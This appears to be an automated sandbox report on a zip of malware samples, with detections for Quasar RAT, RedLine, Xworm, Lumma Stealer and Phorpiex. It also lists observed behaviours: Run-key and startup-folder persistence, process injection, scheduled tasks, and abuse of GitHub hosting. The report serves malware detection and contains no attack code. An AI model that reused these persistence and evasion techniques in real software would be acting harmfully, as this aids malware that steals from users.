Analysis Overview
SHA256
cf99eaaa334a9c8ffc2fe0e1068ffcc02dda1dd8b2b0eab2821182c5d2c1f51d
Threat Level: Known bad
The file 241127-xqsswsslej_pw_infected.zip was found to be: Known bad.
Malicious Activity Summary
Quasar RAT
RedLine payload
Detect Xworm Payload
Lumma family
Lumma Stealer, LummaC
Redline family
Quasar payload
Suspicious use of NtCreateUserProcessOtherParentProcess
Quasar family
RedLine
Phorphiex, Phorpiex
Xworm
Phorphiex family
Xworm family
Phorphiex payload
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Reads user/profile data of web browsers
A potential corporate email address has been identified in the URL: [email protected]
A potential corporate email address has been identified in the URL: [email protected]
A potential corporate email address has been identified in the URL: [email protected]
Drops startup file
A potential corporate email address has been identified in the URL: [email protected]
Loads dropped DLL
A potential corporate email address has been identified in the URL: [email protected]
A potential corporate email address has been identified in the URL: [email protected]
A potential corporate email address has been identified in the URL: [email protected]
Executes dropped EXE
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Looks up external IP address via web service
Drops file in System32 directory
Suspicious use of SetThreadContext
UPX packed file
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Windows directory
System Network Configuration Discovery: Internet Connection Discovery
Program crash
Enumerates physical storage devices
Detects Pyinstaller
Unsigned PE
System Location Discovery: System Language Discovery
Office loads VBA resources, possible macro or embedded object present
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Modifies system certificate store
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Runs net.exe
Suspicious use of AdjustPrivilegeToken
Suspicious use of UnmapMainImage
Suspicious use of SendNotifyMessage
Runs ping.exe
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of WriteProcessMemory
Opens file in notepad (likely ransom note)
Suspicious behavior: AddClipboardFormatListener
Checks processor information in registry
Modifies data under HKEY_USERS
Modifies registry class
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-12-14 20:22
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-14 20:22
Reported
2024-12-14 20:29
Platform
win7-20240903-es
Max time kernel
354s
Max time network
355s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Lumma Stealer, LummaC
Lumma family
Phorphiex family
Phorphiex payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Phorphiex, Phorpiex
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4828 created 512 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 2916 created 1276 | N/A | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\mnftyjkrgjsae.exe | C:\Windows\Explorer.EXE |
Xworm
Xworm family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
A potential corporate email address has been identified in the URL: [email protected]
A potential corporate email address has been identified in the URL: [email protected]
A potential corporate email address has been identified in the URL: [email protected]
A potential corporate email address has been identified in the URL: [email protected]
A potential corporate email address has been identified in the URL: [email protected]
A potential corporate email address has been identified in the URL: [email protected]
A potential corporate email address has been identified in the URL: [email protected]
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\XClient.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\XClient.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77Security = "C:\\Users\\Admin\\AppData\\Roaming\\$77Security.exe" | C:\Users\Admin\AppData\Local\Temp\$77Security.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\m.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\XClient.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\devtun\RuntimeBroker.exe | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\RuntimeBroker.exe | N/A |
| File opened for modification | C:\Windows\system32\devtun\RuntimeBroker.exe | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\RuntimeBroker.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\System32\Tasks\$77Security | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\$77Security | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Discord | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3596 set thread context of 3664 | N/A | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\MK.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 3876 set thread context of 3916 | N/A | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\5hvzv2sl.exe | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\5hvzv2sl.exe |
| PID 4828 set thread context of 2616 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\appcompat\programs\RecentFileCache.bcf | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-A90000000001}\SC_Reader.exe | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File opened for modification | \??\c:\windows\installer\{ac76ba86-7ad7-1033-7b44-a90000000001}\sc_reader.exe | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| File created | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\m.exe | N/A |
| File opened for modification | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\m.exe | N/A |
| File created | C:\Windows\Tasks\Dctooux.job | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\8fc809.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\5hvzv2sl.exe |
System Location Discovery: System Language Discovery
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 1826adc8664edb01 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlot = "8" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000020000000300000001000000ffffffff | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 02000000030000000000000001000000ffffffff | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
